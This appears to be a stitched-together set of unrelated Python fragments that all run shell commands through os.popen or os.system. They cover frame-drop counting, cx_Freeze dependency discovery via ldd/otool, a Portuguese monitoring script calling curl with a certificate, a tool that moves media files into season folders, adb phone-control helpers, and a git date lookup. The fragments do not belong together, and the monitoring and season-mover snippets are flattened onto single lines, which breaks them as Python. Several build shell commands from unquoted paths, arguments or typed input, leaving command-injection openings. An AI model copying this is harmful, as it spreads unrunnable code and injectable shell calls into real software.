    fps = int(round((frame_count - 1) / seconds))
    # Dropped-frame estimation: re-normalize the frame lengths; with
    # min_normalized_delta None this directly yields the deltas between
    # consecutive entries of frame_lengths.
    length_changes, normalized_changes = self.GetNormalizedDeltas(frame_lengths, refresh_period)
    # entries of normalized_changes greater than 0 represent dropped frames
    jankiness = [max(0, round(change)) for change in normalized_changes]
    pause_threshold = 20
    # count changes in (0, pause_threshold) as janks; larger gaps are treated
    # as pauses rather than dropped frames
    jank_count = sum(1 for change in jankiness if change > 0 and change < pause_threshold)
    return fps, jank_count
def _GetDependentFiles(self, path):
    """Return the file's dependencies using platform-specific tools
       (the imagehlp library on Windows, otool on Mac OS X and ldd on
       Linux); limit this list by the exclusion lists as needed"""
    dirname = os.path.dirname(path)
    # Results are memoized per path in self.dependentFiles.
    dependentFiles = self.dependentFiles.get(path)
    if dependentFiles is None:
        if sys.platform == "win32":
            # Temporarily extend PATH with sys.path so imagehlp can
            # resolve dependent DLLs that live next to Python modules.
            origPath = os.environ["PATH"]
            os.environ["PATH"] = origPath + os.pathsep + \
                os.pathsep.join(sys.path)
            import cx_Freeze.util
            try:
                dependentFiles = cx_Freeze.util.GetDependentFiles(path)
            except cx_Freeze.util.BindError:
                # Sometimes this gets called when path is not actually a library
                # See issue 88
                dependentFiles = []
            os.environ["PATH"] = origPath
        else:
            dependentFiles = []
            # otool and ldd print one dependency per line but with
            # different layouts; pick the separator and field per platform.
            if sys.platform == "darwin":
                command = 'otool -L "%s"' % path
                splitString = " (compatibility"
                dependentFileIndex = 0
            else:
                command = 'ldd "%s"' % path
                splitString = " => "
                dependentFileIndex = 1
            for line in os.popen(command):
                parts = line.expandtabs().strip().split(splitString)
                if len(parts) != 2:
                    continue
                dependentFile = parts[dependentFileIndex].strip()
                # Skip the library's self-reference (reported by otool).
                if dependentFile == os.path.basename(path):
                    continue
                # Warn once per unresolved library rather than failing.
                if dependentFile in ("not found", "(file not found)"):
                    fileName = parts[0]
                    if fileName not in self.linkerWarnings:
                        self.linkerWarnings[fileName] = None
                        message = "WARNING: cannot find %s\n" % fileName
                        sys.stdout.write(message)
                    continue
                # ldd pseudo-entries such as "(0x...)" carry no file name.
                if dependentFile.startswith("("):
                    continue
                # Strip a trailing " (address)" annotation if present.
                pos = dependentFile.find(" (")
                if pos >= 0:
                    dependentFile = dependentFile[:pos].strip()
                if dependentFile:
                    dependentFiles.append(dependentFile)
            if sys.platform == "darwin":
                # Make library paths absolute. This is needed to use
                # cx_Freeze on OSX in e.g. a conda-based distribution.
                # Note that with @rpath we just assume Python's lib dir,
                # which should work in most cases.
                dependentFiles = [p.replace('@loader_path', dirname)
                                  for p in dependentFiles]
                dependentFiles = [p.replace('@rpath', sys.prefix + '/lib')
                                  for p in dependentFiles]
        # Filter through the copy/exclusion rules and cache the result.
        dependentFiles = self.dependentFiles[path] = \
            [self._CheckDependentFile(f, dirname) \
             for f in dependentFiles if self._ShouldCopyFile(f)]
    return dependentFiles
try: args = sys.argv if( len(sys.argv) > 1): MAXTIME_WARNING = int(args[1]) if( len(sys.argv) > 2): MAXTIME_CRITICAL = int(args[2]) if( len(sys.argv) > 3): CERT = str(args[3]) if( len(sys.argv) > 4): API_URL = str(args[4]) except Exception as e: print('Falha ao ler ou setar parametros: '+ str(e)) exit(4) COMANDO_PENDENCIAS = 'curl -s -S --cert ' + CERT + ' ' + API_URL # buscar as pendencias try: strPends = os.popen(COMANDO_PENDENCIAS).read() tmp = json.loads(strPends) except Exception as e: print('Falha ao ler ou abrir a lista de pendencias do barramento. ' + str(e)) print('Verifique se o certificado eh aceito pelo barrramento. Rode o seguinte comando e ') print('certifique-se que retorne um json valido: ' + COMANDO_PENDENCIAS) exit(4) # transformar pendencias em um json plano (cada elemento um idt unico) jsoPends = {} for t in tmp: j = { str(t['IDT']): { "status": t['status'] }
def season(config): """ This moves files in a directory into a seasonal directory in the same path: Grand Blue/{files} --> Grand Blue/Season 1/{files} Commands: 1. Move all {files} to the same path, but with parent dir path added with - temp 2. Move all {files} from temp to path/{Season}, and remove the temp path. """ # This command only works with Premiered shows. try: path = input("Please enter the path of the show, with Premiered as root: ") new_season = input("Please input the season folder name: ") except: print("Exiting...") sys.exit(1) # For each path, update it for r in config.getList(): print("Now working on %s%s%s (%s%s%s)" % (Colors.WARNING, r[0], Colors.ENDC, Colors.OKBLUE, r[2], Colors.ENDC )) # Check if the path exists. res = os.popen(LIST % (r[0], r[2], path)).read() res = json.loads(res) # If the folder doesn't exist, skip it. if len(res) == 0: print("%sNOTICE%s: Path under %s%s/%s/%s%s does not exist, skipping..." % (Colors.WARNING, Colors.ENDC, Colors.FAIL, r[0], r[2], path, Colors.ENDC)) continue # Move the files first to a temporary directory, append " - temp" to parent path if path.endswith("/"): path = path[:-1] # Splice the last "/" out temp_path = path + " - temp" # Make the temp dir and move print("%sNOTICE%s: Making temporary directory: %s%s/%s/%s%s..." % (Colors.WARNING, Colors.ENDC, Colors.FAIL, r[0], r[2], temp_path, Colors.ENDC), end=" ") sys.stdout.flush() os.system(MKDIR % (r[0], r[2], temp_path)) print("Done") print("%sNOTICE:%s Moving files to temporary directory..." % (Colors.WARNING, Colors.ENDC), end=" ") sys.stdout.flush() os.system(MOVE1 % (r[0], r[2], path, r[0], r[2], temp_path)) print("Done") new_path = path + "/" + new_season print("%sNOTICE%s: Moving files to %s%s/%s/%s%s..." % (Colors.WARNING, Colors.ENDC, Colors.FAIL, r[0], r[2], new_path, Colors.ENDC), end=" ") sys.stdout.flush() os.system(MOVE2 % (r[0], r[2], temp_path, r[0], r[2], new_path)) print("Done")
def phone_back():
    """Press the device's Back key (keyevent 4) over adb."""
    back_cmd = 'adb -s QMFDU20630010700 shell input keyevent 4'
    os.popen(back_cmd)
def get_androidversion(self):
    """Return the device's major Android version as an int.

    BUGFIX: the previous implementation kept only the first character of
    `ro.build.version.release`, which mis-reports any two-digit version
    (Android "10" became 1).  Now the full major component is parsed, and
    dotted versions like "7.1.1" still yield 7.
    """
    command = adb + " -s {} shell getprop ro.build.version.release".format(self.get_mdevice())
    version = os.popen(command).read().strip()
    return int(version.split('.')[0])
def phone_click(x, y):
    """Tap the device screen at (x, y) over adb."""
    os.popen('adb -s QMFDU20630010700 shell input tap %s %s' % (x, y))
def phone_home():
    """Press the device's Home key (keyevent 3) over adb."""
    home_cmd = 'adb -s QMFDU20630010700 shell input keyevent 3'
    # Keep the original read mode and line buffering for the pipe.
    os.popen(home_cmd, 'r', 1)
def get_git_date(file_path):
    """Return the first output line of CMD_GIT_DATE for *file_path*.

    Yields '' when the command produces no output.
    """
    pipe = os.popen(CMD_GIT_DATE % file_path)
    # readline() returns '' at EOF, so an empty result passes through
    # unchanged — identical to the original first-iteration early return.
    first_line = pipe.readline()
    return first_line.replace("\n", "")
def phone_swipe(x1, y1, x2, y2):
    """Swipe on the device screen from (x1, y1) to (x2, y2) over adb."""
    coords = ' '.join(str(v) for v in (x1, y1, x2, y2))
    os.popen('adb -s QMFDU20630010700 shell input swipe ' + coords)